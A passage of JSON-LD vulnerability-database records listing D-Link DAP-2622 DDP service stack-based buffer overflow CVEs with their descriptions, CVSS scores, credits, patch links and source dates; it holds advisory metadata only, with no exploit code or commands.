"id": "CVE-2023-37313",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-37313",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-37313",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29683",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set IPv4 Address Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20090. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-37313"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"db": "VULMON",
"id": "CVE-2023-37313"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-37313",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1267",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20090",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29683",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-37313",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"db": "VULMON",
"id": "CVE-2023-37313"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"id": "VAR-202308-3135",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29683"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29683"
}
]
},
"last_update_date": "2025-12-19T22:28:23.079000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29683)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776461"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1267/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-37313"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-37313"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"db": "VULMON",
"id": "CVE-2023-37313"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"db": "VULMON",
"id": "CVE-2023-37313"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"date": "2024-05-03T02:15:41.063000",
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1267"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29683"
},
{
"date": "2025-05-14T09:04:00",
"db": "JVNDB",
"id": "JVNDB-2023-028905"
},
{
"date": "2025-05-13T13:55:51.717000",
"db": "NVD",
"id": "CVE-2023-37313"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028905"
}
],
"trust": 0.8
}
}
VAR-202308-3118
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set Date-Time Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20083. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3118",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
}
],
"trust": 0.7
},
"cve": "CVE-2023-35755",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29679",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-35755",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-35755",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-35755",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-35755",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
"id": "CVE-2023-35755",
"trust": 0.7,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2025-29679",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DAP-2622 DDP Set Date-Time Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. \n\nThe specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20083. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-35755"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"db": "VULMON",
"id": "CVE-2023-35755"
}
],
"trust": 2.88
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-35755",
"trust": 4.0
},
{
"db": "ZDI",
"id": "ZDI-23-1260",
"trust": 2.6
},
{
"db": "DLINK",
"id": "SAP10349",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910",
"trust": 0.8
},
{
"db": "ZDI_CAN",
"id": "ZDI-CAN-20083",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2025-29679",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-35755",
"trust": 0.1
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"db": "VULMON",
"id": "CVE-2023-35755"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"id": "VAR-202308-3118",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29679"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2025-29679"
}
]
},
"last_update_date": "2025-12-19T22:28:23.041000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "D-Link has issued an update to correct this vulnerability.",
"trust": 0.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10349"
},
{
"title": "Patch for D-Link DAP-2622 Stack Buffer Overflow Remote Code Execution Vulnerability (CNVD-2025-29679)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/776436"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "CWE-121",
"trust": 1.0
},
{
"problemtype": "Stack-based buffer overflow (CWE-121) [ others ]",
"trust": 0.8
},
{
"problemtype": " Out-of-bounds writing (CWE-787) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10349"
},
{
"trust": 1.9,
"url": "https://www.zerodayinitiative.com/advisories/zdi-23-1260/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-35755"
},
{
"trust": 0.6,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2023-35755"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"db": "VULMON",
"id": "CVE-2023-35755"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"db": "VULMON",
"id": "CVE-2023-35755"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"date": "2025-12-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"date": "2025-05-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"date": "2024-05-03T02:15:40.217000",
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-08-25T00:00:00",
"db": "ZDI",
"id": "ZDI-23-1260"
},
{
"date": "2025-12-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2025-29679"
},
{
"date": "2025-05-14T09:04:00",
"db": "JVNDB",
"id": "JVNDB-2023-028910"
},
{
"date": "2025-05-13T13:55:34.040000",
"db": "NVD",
"id": "CVE-2023-35755"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0Systems,\u00a0Inc.\u00a0 of \u00a0DAP-2622\u00a0 Out-of-bounds write vulnerability in firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-028910"
}
],
"trust": 0.8
}
}
VAR-202308-3111
Vulnerability from variot - Updated: 2025-12-19 22:28D-Link DAP-2622 DDP Set IPv6 Address Secondary DNS Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20096. D-Link Systems, Inc. of DAP-2622 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The D-Link DAP-2622 is a wireless access point (AP) from D-Link that supports PoE power supply and is primarily used for wireless network coverage in enterprise or commercial settings
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202308-3111",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dap-2622",
"scope": null,
"trust": 2.1,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "1.10b03r022"
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dap-2622",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dap-2622 firmware 1.10b03r022"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
},
{
"db": "CNVD",
"id": "CNVD-2025-29685"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-028892"
},
{
"db": "NVD",
"id": "CVE-2023-37318"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry \"InfoSecDJ\" Janushkevich of Trend Micro Zero Day Initiative",
"sources": [
{
"db": "ZDI",
"id": "ZDI-23-1272"
}
],
"trust": 0.7
},
"cve": "CVE-2023-37318",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 8.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 6.5,
"id": "CNVD-2025-29685",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "zdi-disclosures@trendmicro.com",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37318",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37318",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "ZDI",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2023-37318",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 0.7,
"userInteraction": "NONE",
"vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "zdi-disclosures@trendmicro.com",
"id": "CVE-2023-37318",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "nvd@nist.gov",
"id": "CVE-2023-37318",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2023-37318",
"trust": 0.8,
"value": "High"
},
{
"author": "ZDI",
